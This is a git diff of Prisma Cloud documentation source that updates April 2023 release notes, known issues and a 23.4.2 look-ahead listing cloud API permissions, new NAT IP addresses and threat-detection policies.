xref:prisma-cloud-compute-release-information.adoc#id79d9af81-3080-471d-9cd1-afe25c775be3[Prisma Cloud Compute Release Information] for the latest features the host, container, and serverless capabilities that are available on the *Compute* tab on Prisma Cloud. Currently there are no previews or announcements for updates. +See xref:prisma-cloud-compute-release-information.adoc#id79d9af81-3080-471d-9cd1-afe25c775be3[Prisma Cloud Compute Release Information] for the latest features the host, container, and serverless capabilities that are available on the *Compute* tab on Prisma Cloud. -//Note that the details and functionality listed below are a preview of what is planned in the next Compute update planned for January 15, 2023; the changes listed herein and the actual release date is subject to change. +//Currently there are no previews or announcements for updates. +Note that the details and functionality listed below are a preview of what is planned in the next Compute update planned for Apr xx, 2023; the changes listed herein and the actual release date is subject to change. + +* xref:#new-features-prisma-cloud-compute[New Features in Prisma Cloud Compute] + +[#new-features-prisma-cloud-compute] +=== New Features in Prisma Cloud Compute + +[cols="50%a,50%a"] +|=== +|Feature +|Description + +2+|*New Features in the Core Platform* + +|*New Release Numbering Format* ++++45982+++ +|Starting from this release, that is named 30.00.xxx, the Prisma Cloud versions have a new release numbering format `major release.minor release.build`. +The major release is a number 30, in this case, followed by the minor release sequence that will start with 00 (first release), 01 (minor 1), 02 (minor 2), and so on. +For example, the next maintenance release will be 30.01.build, and maintenance update 2 will be 30.02.build. + +//CWP-29710 +|*Support for Host VM tags from Discovery* ++++29710+++ +|We added support for Azure and GCP VM tags in addition to the already supported AWS and Azure VM tags. + +//CWP-44680 +|*Runtime Protection Support for Photon OS 4.0 Hosts* ++++44680+++ +|Defenders protect your Photon OS 4.0 host during runtime. + +//CWP-39892 +|*Support Vulnerability Management for CentOS Stream* ++++39892+++ +|We added support for CentOS Stream for vulnerability scanning. + +|*User Management Role* ++++44842+++ +|You can define two distinct system roles to manage authentication permissions. This change gives you more granular control over these permissions. The permissions of the old Authentication system role are now split into the User Management and Authentication Configuration system roles. + +//CWP-42899 +|*Cloud Radar Improvements* ++++42899+++ +|Improved filters and performance for the cloud Radar under *Radars > Cloud*. + +image::rn-cwp-42899.png[width=800] + +//CWP-39186 +|*Support .NET Packages (Nuget, Paket)* ++++39186+++ +|Added support for vulnerability scanning of the Nuget and Packet .NET packages. You must use twistcli to scan your hosts for these vulnerabilities.Your images and Lambda functions can be scanned using the console or twistcli. + +//CWP-46186 +|*Support OEL 7* ++++46186+++ +|Added support for Oracle Enterprise Linux 7 on x86. + +//CWP-45663 +|*Support for RHEL 9* ++++45663+++ +|Added support for RedHat Enterprise Linux 9 on x86 and on ARM. + +2+|*New Features in Agentless Security* + +|*Support for Encrypted Volume Agentless Scanning with AWS Hub Accounts* ++++35976+++ +| You can now use agentless scanning with your AWS hub accounts to scan encrypted volumes. + +|*Support for Bottlerocket* ++++35296+++ +| Agentless scanning is now supported on Bottlerocket containers and images. + +//CWP-44014 +|*Support for Shared VPC in GCP* ++++44014+++ +|If you are using a shared VPC in GCP as part of your hub and target account scanning, you can define a VPC in your hub account, and share it with all the service accounts connected to it. +You can now enter a subnet address from the hub account that Prisma Cloud uses to run the VM for agentless scanning of the target accounts using the following convention: + +[source] +---- +projects/{host_project_name}/regions/{region_name}/subnetworks/{subnet_name} +---- + +Additionally, you must grant the following permissions to the service account you use to scan your target account. This should be the account that owns the shared VPC. + +`compute.subnetworks.use` + +`compute.subnetworks.useExternalIp` + + +2+|*New Features in Host Security* + +//CWP-39820 +|*Support for CBL-Mariner on Hosts* ++++39820+++ +|Added support for deploying Host Defenders on CBL Mariner 2.0 Linux-based OS for Azure. + +2+|*New Features in Serverless* + +2+|*New features in Web Application and API Security (WAAS)* + +|*Customizable CAPTCHA page for WAAS Bot protection* ++++44858+++ +|You can now embed a custom reCAPTCHA page branded to fit your application and protect your website from spam and abuse. The WAAS Bot Protection is available on *Defend > WAAS > Active Bot Detection*. + +image::rn-cwp-44858.png[width=300] + +2+|*End-of-Support Notifications* + +|*End of Support for a serverless scan API endpoint* ++++46784+++ +|Ends the support for `/api/vVERSION/settings/serverless-scan`. + +|=== diff --git a/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-2023.adoc b/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-2023.adoc index 64cafa8a4..68005b782 100644 --- a/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-2023.adoc +++ b/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-2023.adoc @@ -4,6 +4,7 @@ Stay informed on the new capabilities and policies added to Prisma Cloud in 2023 The following topics provide a snapshot of new features introduced for Prisma™ Cloud in 2023. Refer to the https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin[Prisma™ Cloud Administrator’s Guide] for more information on how to use the service. +* xref:features-introduced-in-april-2023.adoc[Features Introduced in April 2023] * xref:features-introduced-in-march-2023.adoc[Features Introduced in March 2023] * xref:features-introduced-in-february-2023.adoc[Features Introduced in February 2023] * xref:features-introduced-in-january-2023.adoc[Features Introduced in January 2023] diff --git a/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-april-2023.adoc b/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-april-2023.adoc new file mode 100644 index 000000000..72c358a5d --- /dev/null +++ b/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-april-2023.adoc @@ -0,0 +1,256 @@ +== Features Introduced in April 2023 + +Learn what's new on Prisma™ Cloud in April 2023. + +//* <> +* <> + +[#new-features-apr-1] +=== New Features Introduced in 23.4.1 + +* <> +* <> +* <> +* <> +* <> +* <> +* <> + + +[#new-features1] +=== New Features + +[cols="50%a,50%a"] +|=== +|FEATURE +|DESCRIPTION + +|*Support for New Region on AWS* +//RLP-96026 + +|Prisma Cloud now ingests data for resources deployed in the Hyderabad cloud region on AWS. + +To review a list of supported regions, select "Inventory > Assets", and choose https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/connect-your-cloud-platform-to-prisma-cloud/cloud-service-provider-regions-on-prisma-cloud#id091e5e1f-e6d4-42a8-b2ff-85840eb23396_id9c4f8473-140d-4e4a-94a1-523e00ebfbe4[Cloud Region] from the filter drop-down. + +image::aws-hyd-region.png[scale=30] + + +|tt:[Enahancement] *OCI Terraform File Update* +//RLP-86137 +|Prisma Cloud now supports over 100 IAM policy statements without requiring a service limit increase from OCI. With this change, you must https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud#:~:text=Update%20an%20Onboarded%20OCI%20Account[update] your existing Terraform file to enable read permissions for all the supported services necessary for an OCI tenant on Prisma Cloud. + +|=== + + +[#api-ingestions1] +=== API Ingestions + +[cols="50%a,50%a"] +|=== +|SERVICE +|API DETAILS + +|*Azure Virtual WAN* +//RLP-95728 + +|*azure-vpn-server-configurations* + +Additional permission required: + +* screen:[Microsoft.Network/vpnServerConfigurations/read] + +The Reader role includes the permission. + +|*Azure Virtual WAN* +//RLP-95723 + +|*azure-p2s-vpn-gateway* + +Additional permission required: + +* screen:[Microsoft.Network/p2sVpnGateways/read] + +The Reader role includes the permission. + + +|*Google Certificate Authority Service* +//RLP-95648 + +|*gcloud-certificate-authority-certificate-template* + +Additional permissions required: + +* screen:[privateca.locations.list] +* screen:[privateca.certificateTemplates.list] +* screen:[privateca.certificateTemplates.getIamPolicy] + +The Viewer role includes the permissions. + + +|*Google Traffic Director Network Service* +//RLP-95651 + +|*gcloud-traffic-director-network-service-gateway* + +Additional permissions required: + +* screen:[networkservices.locations.list] +* screen:[networkservices.gateways.list] + +The Viewer role includes the permissions. + + +|*Google Traffic Director Network Service* +//RLP-95650 + +|*gcloud-traffic-director-network-service-mesh* + +Additional permissions required: + +* screen:[networkservices.locations.list] +* screen:[networkservices.meshes.list] +* screen:[networkservices.meshes.getIamPolicy] + +The Viewer role includes the permissions. + +|=== + + +[#new-policies1] +=== New Policies + +[cols="50%a,50%a"] +|=== +|NEW POLICIES +|DESCRIPTION + +|*AWS EC2 instance publicly exposed with critical/high exploitable vulnerabilities and malware activity* +//RLP-96222 +|Identifies AWS EC2 instances which are publicly exposed and have exploitable vulnerabilities that are connected with remote systems known for malware activities. Malware includes viruses, trojans, worms and other types of malware that affect the popular open-source operating system. The network connectivity with remote systems known for malware activity on a publicly exposed and exploitable instance indicates that the instance could be under attack or already have been compromised. + +*Policy Severity—* Critical. + +|*AWS EC2 instance publicly exposed with critical/high exploitable vulnerabilities and botnet activity* +//RLP-96219 +|Identifies AWS EC2 instances which are publicly exposed and have exploitable vulnerabilities that are connected with remote systems known for botnet activities. A Botnets can be used to perform distributed denial-of-service (DDoS) attacks, steal data, send spam, and allows the attacker to access the device and its connection. The network connectivity with remote systems known for botnet activity on a publicly exposed and exploitable instance indicates that the instance could be under attack or already have been compromised. + +*Policy Severity—* Critical. + +|*AWS EC2 instance publicly exposed with critical/high exploitable vulnerabilities and cryptominer activity* +//RLP-96024 +|Identifies AWS EC2 instances which are publicly exposed and have exploitable vulnerabilities that are connected with remote systems known for cryptominer activities. Cryptominer hides on computers or mobile devices to surreptitiously use the machine’s resources to mine cryptocurrencies. The network connectivity with remote systems known for cryptominer activity on a publicly exposed and exploitable instance indicates that the instance could be under attack or already have been compromised. + +*Policy Severity—* Critical. + +|*AWS EC2 instance publicly exposed with critical/high exploitable vulnerabilities and backdoor activity* +//RLP-96023 +|Identifies AWS EC2 instances which are publicly exposed and have exploitable vulnerabilities that are connected with remote systems known for backdoor activities. A backdoor allows unauthorized remote access to the instances where the malware is installed while bypassing the authentication mechanisms in place. The network connectivity with remote systems known for backdoor activity on a publicly exposed and exploitable instance indicates that the instance could be under attack or already have been compromised. + +*Policy Severity—* Critical. + + +|=== + +[#policy-updates1] +=== Policy Updates + +No Policy Updates for 23.4.1. + +[#new-compliance-benchmarks-and-updates1] +=== New Compliance Benchmarks and Updates + +[cols="50%a,50%a"] +|=== +|COMPLIANCE BENCHMARK +|DESCRIPTION + + +|*Support for ISO/IEC 27001:2022* + +//RLP-96841 +|Prisma Cloud now supports the ISO/IEC 27001:2022 compliance standard. + +ISO/IEC 27001:2022 provides guidelines for organizational information security standards and information security management practices, including the selection, implementation, and management of controls while taking the organization's information security risk environment into account. + +With this support, you can now view this built-in standard and the related policies on Prisma Cloud’s *Compliance > Standard* page. Additionally, you can generate reports for immediate viewing or download, or you can schedule recurring reports to keep track of this compliance standard over time. + +|=== + + +[#changes-in-existing-behavior1] +=== Changes in Existing Behavior + +[cols="50%a,50%a"] +|=== +|FEATURE +|DESCRIPTION + +|*Changes to Policy Severity Level* tt:[First announced in 23.2.1] +//RLP-90803, RLP-97339 + +|Prisma Cloud updated the system default policies to help you identify critical alerts and address them effectively. The policy severity levels for some system default policies are re-aligned to use the newly introduced *Critical* and *Informational* severities. Due to this change, the policies have five levels of severity; Critical, High, Medium, Low, and Informational. You can prioritize critical alerts first and then move on to the other levels. For more information, see the updated https://docs.paloaltonetworks.com/content/dam/techdocs/en_US/pdf/prisma/prisma-cloud/prerelease/policy-severity-level-changes.csv[list of policies]. + +*Impact—* + +* Your existing open alerts associated with updated policies will have a change in their severity levels. +* If you have Alert rules set up based on the *Policy Severity* filter, there may be a decrease or increase in the number of alerts. +* The overall Compliance posture may change due to possible alert number changes. +* If you have alert rules configured for external integrations such as ServiceNow, this shift in the number of alerts may result in sending notifications for the Resolved or Open alerts. +* If you change a custom severity of a policy back to the default severity, the new severity update will apply. + +[NOTE] +==== +This update will not affect the severities of your custom policies or the system default policies for which you have manually changed the severities (custom severity). +Also, if you have included a policy in at least one other alert rule userinput:[(not based on severity filter)], there will be no change in the alert numbers. +==== + +If you have any questions, contact your Prisma Cloud Customer Success Representative. + +|*Update for Google Compute APIs* +//RLP-95461 + +|Prisma Cloud now provides global region support, as well as a backend update to the resource ID for *gcloud-compute-url-maps*, *gcloud-compute-target-http-proxies*, and *gcloud-compute-target-https-proxies* APIs. As a result, all resources for these APIs will be deleted and then regenerated on the management console. + +Existing alerts corresponding to these resources will be resolved as Resource_Updated, and new alerts will be generated against policy violations if any. + +*Impact*—You may notice a reduced alert count. However, once the resources for *gcloud-compute-url-maps*, *gcloud-compute-target-http-proxies*, and *gcloud-compute-target-https-proxies* resume ingesting data, the alert count will return to the original numbers. + + +|=== + + +[#rest-api-updates1] +=== REST API Updates + +[cols="37%a,63%a"] +|=== +|CHANGE +|DESCRIPTION + + +|*New APIs for Onboarding Azure Cloud Accounts* +//RLP-95078 +|The following new endpoints are now available for the Cloud Accounts API. + +* Add Azure Cloud Account- https://pan.dev/prisma-cloud/api/cspm/add-azure-cloud-account/[POST /cas/v1/azure_account] +* Update Azure Cloud Account- https://pan.dev/prisma-cloud/api/cspm/update-azure-cloud-account/[PUT /cas/v1/azure_account/:account_id] +* Generate and Download the Azure Terraform Template- https://pan.dev/prisma-cloud/api/cspm/generate-template-link/[POST /cas/v1/azure_template] + + +|*New APIs for Data Security Onboarding* +//RLP-75685 +|The following new endpoints are now available for the Data Security Onboarding API. + +* Fetch Account Config By Storage UUID- https://pan.dev/prisma-cloud/api/cspm/get-account-config-by-storage-uuid/[GET /config/v3/account/storageUUID/:id] +* Fetch Account Config By PCDS Account ID- https://pan.dev/prisma-cloud/api/cspm/get-account-config-by-pcds-account-id/[GET /config/v3/account/:id] +* Update the account config for the specified PCDS Account ID- https://pan.dev/prisma-cloud/api/cspm/update-pcds-account-config/[PUT /config/v3/account/:id] +* Performs a Permissions Check for the Given PCDS Account- https://pan.dev/prisma-cloud/api/cspm/get-status-pcds-account/[GET /config/v3/account/:id/status] +* Generate an Azure Terraform Script- https://pan.dev/prisma-cloud/api/cspm/generate-network-acl-script-by-account-id/[GET /config/v3/account/:subscriptionId/acl-script] +* Generate an Azure Terraform Script- https://pan.dev/prisma-cloud/api/cspm/get-azure-terraform-script/[GET /config/v3/tenant/:tenantId/:subscriptionId/terraform-script] + + +|=== + + + + diff --git a/cspm/rn/prisma-cloud-release-information/known-issues.adoc b/cspm/rn/prisma-cloud-release-information/known-issues.adoc index 2d55564e0..d11f16d1d 100644 --- a/cspm/rn/prisma-cloud-release-information/known-issues.adoc +++ b/cspm/rn/prisma-cloud-release-information/known-issues.adoc @@ -10,6 +10,12 @@ The following table lists the known issues on Prisma Cloud for the CSPM capabili |*ISSUE ID* |*DESCRIPTION* + +|*RLP-98082* +//Raised in 23.4.1 +|PCDS Azure only—Prisma Cloud is not able to create event grid subscriptions on storage accounts in a few regions due to which it cannot do forward scan on those storage accounts. + + |*RLP-95559* //Raised in 23.3.1 diff --git a/cspm/rn/prisma-cloud-release-information/look-ahead-planned-updates-prisma-cloud.adoc b/cspm/rn/prisma-cloud-release-information/look-ahead-planned-updates-prisma-cloud.adoc index ba62e09eb..cf758cf9b 100644 --- a/cspm/rn/prisma-cloud-release-information/look-ahead-planned-updates-prisma-cloud.adoc +++ b/cspm/rn/prisma-cloud-release-information/look-ahead-planned-updates-prisma-cloud.adoc @@ -3,11 +3,12 @@ Review any deprecation notices and policy changes planned in the next Prisma Cloud release. -Read this section to learn about what is planned in the 23.4.1 release. The Look Ahead announcements are for an upcoming or next release and it is not a cumulative list of all announcements. +Read this section to learn about what is planned in the 23.4.2 release. The Look Ahead announcements are for an upcoming or next release and it is not a cumulative list of all announcements. *Note that the details and functionality listed below are a preview and the actual release date is subject to change.* * <> +* <> * <> * <> * <> @@ -27,24 +28,45 @@ Read this section to learn about what is planned in the 23.4.1 release. The Look |Beginning with the 23.4.2 release, Prisma Cloud will provide a simplified onboarding experience to adapt to your security priorities in a streamlined manner with support for CSPM, CWPP, Data Security, and Identity Security grouped as Foundational and/or Advanced capabilities (with a few enabled by default). The updated onboarding workflow provides a Faster First Time to Value (FTTV) by allowing you to onboard your AWS, Azure, or GCP cloud accounts and selecting the security capabilities in fewer clicks. -|*Changes to Policy Severity Level* -//RLP-90803,RLP-97339 +|*Critical Severity Policies Included in Auto-Enable Default Policies in Enterprise Settings* +//RLP-97518 -|Beginning with the 23.4.1 release, Prisma Cloud will make changes to our system default policies to help you identify the critical alerts and ensure that you can address them efficiently. The severity levels of the system default policies will be modified as part of the planned update. For more information, see the https://docs.paloaltonetworks.com/content/dam/techdocs/en_US/pdf/prisma/prisma-cloud/prerelease/policy-severity-level-changes.csv[list of policies] that are affected. +|Beginning with the 23.4.2 release, Prisma Cloud will include Critical severity policies in the list of policies that are enabled out-of-the-box in "Enterprise Settings > Auto-Enable Default Policies". With this change, both critical and high severity policies (current behavior), will be enabled out-of-the-box. -*Impact-* You may see: +*Impact—* -* Changes in the severity of existing alerts -* Changes in your overall compliance status due to the modified severity of alerts -* Decrease or increase in the number of alerts, based on how your alert rules are set up according to the *Policy Severity* filter -* If you have configured your alert rules to send notifications to external integrations such as ServiceNow, this shift in the number of alerts may result in sending notifications for the modified alert. +* If you had previously selected Medium severity, it will now also include Critical. +* If you had previously selected High and Medium severities, it will now also include Critical. +* If you had previously selected Critical severity, it will be retained. +* If you had not selected any severity, none will be added. + +|*Rate Limit Exception for GCP APIs* +//RLP-73146 +|Beginning with the 23.4.2 release, API calls from Prisma Cloud will use quota from the onboarded GCP Projects instead of the GCP Project where the service account is created. This change will enable Prisma Cloud to ingest resource metadata across multiple projects without exceeding the GCP API rate limits. + +To ensure continuous insights into all your GCP resources, perform the following tasks: + +* Grant either a new permission userinput:[serviceusage.services.use] or add a new role *Service Usage Consumer* userinput:[(roles/serviceusage.serviceUsageConsumer)] to the service account that Prisma Cloud uses to access GCP APIs. + +* tt:[Optional] Enable the following GCP services on each target project from which Prisma Cloud gets resource metadata. + +** screen:[appengine.googleapis.com] +** screen:[recommender.googleapis.com] +** screen:[sqladmin.googleapis.com] +** screen:[apikeys.googleapis.com] +** screen:[iam.googleapis.com] +** screen:[cloudresourcemanager.googleapis.com] +** screen:[orgpolicy.googleapis.com] +** screen:[cloudasset.googleapis.com] +** screen:[accessapproval.googleapis.com] +** screen:[essentialcontacts.googleapis.com] [NOTE] ==== -The severity for a few policies has been changed to maintain uniformity. If you had seen the initial notice for this update, do review the latest csv. +If you use a Terraform template, the permissions to the GCP service account will be updated automatically. ==== -If you have any questions, contact your Prisma Cloud Customer Success Representative. +*Impact*—If the above tasks are not completed, rate limit exception errors may occur for Prisma Cloud's authorized API calls to GCP. |*S3 Flow Logs with Hourly Partition* @@ -54,19 +76,170 @@ If you have any questions, contact your Prisma Cloud Customer Success Representa https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/connect-your-cloud-platform-to-prisma-cloud/onboard-your-aws-account/enable-flow-logs-for-amazon-s3[Configure Flow Logs] with the hourly partition and enable the additional fields required. - |*Update for Google Compute APIs* -//RLP-95461 +//RLP-47280 -|Beginning with the 23.4.1 release, Prisma Cloud will provide global region support, as well as a backend update to the resource ID for *gcloud-compute-url-maps*, *gcloud-compute-target-http-proxies*, and *gcloud-compute-target-https-proxies* APIs. As a result, all resources for these APIs will be deleted and then regenerated on the management console. +|Beginning in the 23.4.2 release, Prisma Cloud will provide global region support, as well as a backend update to the resource ID for *gcloud-compute-internal-lb-backend-service* API. As a result, all resources for these APIs will be deleted and then regenerated on the management console. Existing alerts corresponding to these resources will be resolved as Resource_Updated, and new alerts will be generated against policy violations if any. -*Impact*—You may notice a reduced alert count. However, once the resources for *gcloud-compute-url-maps*, *gcloud-compute-target-http-proxies*, and *gcloud-compute-target-https-proxies* resume ingesting data, the alert count will return to the original numbers. +*Impact*—You may notice a reduced alert count. However, once the resources for *gcloud-compute-internal-lb-backend-service* resume ingesting data, the alert count will return to the original numbers. + + +|=== + + +[#add-ip-address] +=== Addition of New IP Addresses +//RLP-96660, TLDO-466 +Beginning with the 23.4.2 release, Prisma Cloud will add the following NAT IP addresses to the existing list. Make sure to review the list and update the IP addresses in your allow lists. + +[cols="50%a,50%a"] +|=== +|*Prisma Cloud URL (AWS Region)* +|*Source IP Address to Allow* + + +|http://app.prismacloud.io/[app.prismacloud.io] + +us-east-1 (N.Virginia) + +|3.210.133.47 + +34.235.13.250 + +44.207.239.90 + +|http://app2.prismacloud.io/[app2.prismacloud.io] + +us-east-2 (Ohio) + +|18.116.185.157 + +18.223.154.151 + +3.136.199.10 + +|http://app3.prismacloud.io/[app3.prismacloud.io] + +us-west-2 (Oregon) + +|44.233.39.196 + +52.12.85.11 + +54.70.207.107 + +|http://app4.prismacloud.io/[app4.prismacloud.io] + +us-west-1 (N.California) + +|184.72.47.199 + +54.193.251.180 + +54.241.31.130 + +*Compute SaaS Console Region (GCP)* +New egress IPs (from console to the internet) in us-west 1 (Oregon) + +* 35.230.69.118 +* 34.82.138.152 + +|http://app.ind.prismacloud.io/[app.ind.prismacloud.io] + +(India) + +|13.126.142.108 + +3.108.78.191 + +65.0.233.228 + +|http://app.sg.prismacloud.io/[app.sg.prismacloud.io] + +ap-southeast-1 (Singapore) + +|13.251.200.128 + +18.136.72.0 + +18.139.106.36 + +|http://app.anz.prismacloud.io/[app.anz.prismacloud.io] + +ap-southeast-2 (Sydney) + +|13.55.65.214 + +3.104.84.8 + +54.66.162.181 + +|http://app.jp.prismacloud.io/[app.jp.prismacloud.io] + +ap-northeast-1 (Tokyo) + +|18.178.170.193 + +18.182.113.156 + +3.114.23.157 + +|http://app.ca.prismacloud.io/[app.ca.prismacloud.io] + +ca-central-1 (Canada - Central) + +|3.97.19.141 + +3.97.195.202 + +3.97.251.220 + +|http://app.eu.prismacloud.io/[app.eu.prismacloud.io] + +eu-central-1 (Frankfurt) + +|18.184.42.114 + +3.73.209.143 + +3.75.34.63 + +|http://app2.eu.prismacloud.io/[app2.eu.prismacloud.io] + +eu-west-1 (Ireland) + +|52.208.88.215 + +54.170.230.172 + +54.72.135.50 + +|http://app.uk.prismacloud.io/[app.uk.prismacloud.io] + +eu-west2 (London) + +|13.42.159.205 + +3.8.248.150 + +35.176.28.215 + +|http://app.fr.prismacloud.io/[app.fr.prismacloud.io] + +eu-west-3 (Paris) + +|13.36.26.86 + +13.37.138.49 + +13.37.20.19 |=== + [#new-policies] === New Policies @@ -85,7 +258,7 @@ The folder contains RQL based Config, Network, and Audit Event policies in JSON + The *Master* branch represents the current Prisma Cloud release that is generally available. You can switch to a previous release or the next release branch, to review the policies that were published previously or are planned for the upcoming release. + -Because Prisma Cloud typically has 2 releases in a month, the release naming convention in GitHub is PCS-... For example, PCS-23.4.1. +Because Prisma Cloud typically has 2 releases in a month, the release naming convention in GitHub is PCS-... For example, PCS-23.4.2. . Review the updates. + @@ -97,81 +270,272 @@ Use the *policies* folder to review the JSON for each policy that is added or up [#policy-updates] === Policy Updates -No Policy Updates for 23.4.1. +No Policy Updates for 23.4.2. [#api-ingestions] === API Ingestions -The following API ingestion updates are planned for Prisma Cloud in 23.4.1: +The following API ingestion updates are planned for Prisma Cloud in 23.4.2: [cols="50%a,50%a"] |=== |SERVICE |API DETAILS -|*Azure Virtual WAN* -//RLP-95728 +|*Amazon Firewall Manager* +//RLP-97013 +|*aws-fms-admin-account* + +Additional permission required: + +* screen:[fms:GetAdminAccount] + +You must manually add the permission or update the CFT template to enable them. + +|*Amazon Firewall Manager* +//RLP-97037 +|*aws-fms-compliance-status* + +Additional permissions required: + +* screen:[fms:ListPolicies] +* screen:[fms:ListComplianceStatus] + +The Security Audit role includes the permissions. -|*azure-vpn-server-configurations* + +|*Amazon Firewall Manager* +//RLP-95502 +|*aws-fms-policy* + +Additional permissions required: + +* screen:[fms:GetAdminAccount] +* screen:[fms:ListPolicies] +* screen:[fms:GetPolicy] + +The Security Audit role only includes the * screen:[fms:ListPolicies] permission. + +[NOTE] +==== +You must manually add the permission or update the CFT template to enable screen:[fms:GetPolicy] and screen:[fms:GetAdminAccount] . +==== + +|tt:[Update] *Amazon RDS* +//RLP-97823 +|*aws-rds-db-cluster* + +This API is updated to include a new field screen:[dBclusterParameterGroupArn] in the resource JSON. + + +|*Azure CDN* +//RLP-96258 +|*azure-frontdoor-standardpremium-origin-groups* + +Additional permissions required: + +* screen:[Microsoft.Cdn/profiles/read] +* screen:[Microsoft.Cdn/profiles/origingroups/read] + +The Reader role includes the permissions. + +|*Azure CDN* +//RLP-96252 +|*azure-frontdoor-standardpremium-security-policies* + +Additional permissions required: + +* screen:[Microsoft.Cdn/profiles/read] +* screen:[Microsoft.Cdn/profiles/securitypolicies/read] + +The Reader role includes the permissions. + +|tt:[Update] *Azure Event Hubs* +//RLP-93890 + +|*azure-event-hub-namespace* + +This API is updated to include the following new fields in the resource JSON: + +* screen:[MinimumTlsVersion] +* screen:[disableLocalAuth] + +|tt:[Update] *Azure Service Bus* +//RLP-93891 + +|*azure-service-bus-namespace* + +This API is updated to include a new field screen:[MinimumTlsVersion] in the resource JSON. + +|*Google Cloud Function* +//RLP-96702 +|*gcloud-cloud-function-v2* + +Additional permissions required: + +* screen:[cloudfunctions.locations.list] +* screen:[cloudfunctions.functions.list] +* screen:[cloudfunctions.functions.getIamPolicy] + +The Viewer role includes the permissions. + + +|*Google Cloud Memorystore for Memcached* +//RLP-96697 +|*gcloud-memorystore-memcached-instance* + +Additional permissions required: + +* screen:[memcache.locations.list] +* screen:[memcache.instances.list] + +The Viewer role includes the permissions. + + +|*OCI Database* +//RLP-95386 +|*oci-database-autonomous-database* + +Additional permission required: + +* screen:[AUTONOMOUS_DATABASE_INSPECT] + +You must download and execute the Terraform template from the console to enable the permission. + + +|*OCI Database* +//RLP-95388 +|*oci-database-db-home* Additional permission required: -* screen:[Microsoft.Network/vpnServerConfigurations/read] +* screen:[DB_HOME_INSPECT] + +You must download and execute the Terraform template from the console to enable the permission. + +|*OCI Database* +//RLP-95399 +|*oci-database-db-home-patch* -The Reader role includes the permission. +Additional permission required: + +* screen:[DB_HOME_INSPECT] -|*Azure Virtual WAN* -//RLP-95723 +You must download and execute the Terraform template from the console to enable the permission. -|*azure-p2s-vpn-gateway* +|*OCI Database* +//RLP-95402 +|*oci-database-db-system-patch* Additional permission required: -* screen:[Microsoft.Network/p2sVpnGateways/read] +* screen:[DB_SYSTEM_INSPECT] + +You must download and execute the Terraform template from the console to enable the permission. -The Reader role includes the permission. +|*OCI DataLabeling* +//RLP-91477 +|*oci-datalabeling-dataset* +Additional permissions required: + +* screen:[DATA_LABELING_DATASET_INSPECT] +* screen:[DATA_LABELING_DATASET_READ] -|*Google Certificate Authority Service* -//RLP-95648 +You must download and execute the Terraform template from the console to enable the permissions. -|*gcloud-certificate-authority-certificate-template* +|*OCI File Storage* +//RLP-91466 +|*oci-file-storage-mount-target* Additional permissions required: -* screen:[privateca.locations.list] -* screen:[privateca.certificateTemplates.list] -* screen:[privateca.certificateTemplates.getIamPolicy] +* screen:[COMPARTMENT_INSPECT] +* screen:[MOUNT_TARGET_INSPECT] +* screen:[MOUNT_TARGET_READ] -The Viewer role includes the permissions. +You must download and execute the Terraform template from the console to enable the permissions. +|*OCI JMS* +//RLP-91469 +|*oci-jms-fleet* -|*Google Traffic Director Network Service* -//RLP-95651 +Additional permissions required: + +* screen:[FLEET_INSPECT] +* screen:[FLEET_READ] + +You must download and execute the Terraform template from the console to enable the permissions. -|*gcloud-traffic-director-network-service-gateway* + +|*OCI Service Mesh* +//RLP-93739 +|*oci-service-mesh-access-policy* Additional permissions required: -* screen:[networkservices.locations.list] -* screen:[networkservices.gateways.list] +* screen:[MESH_ACCESS​_POLICY_LIST] +* screen:[MESH_ACCESS​_POLICY_READ] -The Viewer role includes the permissions. +You must download and execute the Terraform template from the console to enable the permissions. +|*OCI Service Mesh* +//RLP-93736 +|*oci-service-mesh-virtual-deployment* -|*Google Traffic Director Network Service* -//RLP-95650 +Additional permissions required: -|*gcloud-traffic-director-network-service-mesh* +* screen:[MESH_VIRTUAL​_DEPLOYMENT_LIST] +* screen:[MESH_VIRTUAL​_DEPLOYMENT_READ] +* screen:[MESH_VIRTUAL_DEPLOYMENT​_PROXY_CONFIG_READ] +* screen:[MESH_PROXY_DETAILS_READ] + +You must download and execute the Terraform template from the console to enable the permissions. + +|*OCI Service Mesh* +//RLP-93733 +|*oci-service-mesh-meshes* Additional permissions required: -* screen:[networkservices.locations.list] -* screen:[networkservices.meshes.list] -* screen:[networkservices.meshes.getIamPolicy] +* screen:[SERVICE_MESH_LIST] +* screen:[SERVICE_MESH_READ] -The Viewer role includes the permissions. +You must download and execute the Terraform template from the console to enable the permissions. + +|*OCI Speech* +//RLP-92726 +|*oci-speech-transcription-job* + +Additional permissions required: + +* screen:[AI_SERVICE_SPEECH_TRANSCRIPTION_JOB_INSPECT] +* screen:[AI_SERVICE_SPEECH_TRANSCRIPTION_JOB_READ] + +You must download and execute the Terraform template from the console to enable the permissions. + +|*OCI Vision* +//RLP-92722 +|*oci-vision-model* + +Additional permissions required: + +* screen:[AI_SERVICE_VISION_MODEL_INSPECT] +* screen:[AI_SERVICE_VISION_MODEL_READ] + +You must download and execute the Terraform template from the console to enable the permissions. + +|*OCI Vision* +//RLP-92718 +|*oci-vision-project* + +Additional permissions required: + +* screen:[AI_SERVICE_VISION_PROJECT_INSPECT] +* screen:[AI_SERVICE_VISION_PROJECT_READ] + +You must download and execute the Terraform template from the console to enable the permissions. |=== @@ -182,13 +546,9 @@ The Viewer role includes the permissions. |=== 2+|Deprecation Notice -|tt:[End of Support for AWS Classic EC2 Service] -//RLP-96041, Added in 23.3.2. -|The userinput:[aws-ec2-classic-instance] API is planned for deprecation at the end of April 2023. As AWS has announced the depreciation of the resource type, Prisma Cloud will no longer ingest the userinput:[aws-ec2-classic-instance] API. For more information, see https://aws.amazon.com/blogs/aws/ec2-classic-is-retiring-heres-how-to-prepare/[Retiring EC2-Classic Networking]. - - |tt:[Prisma Cloud Data Security v1, v2 APIs] -|In the 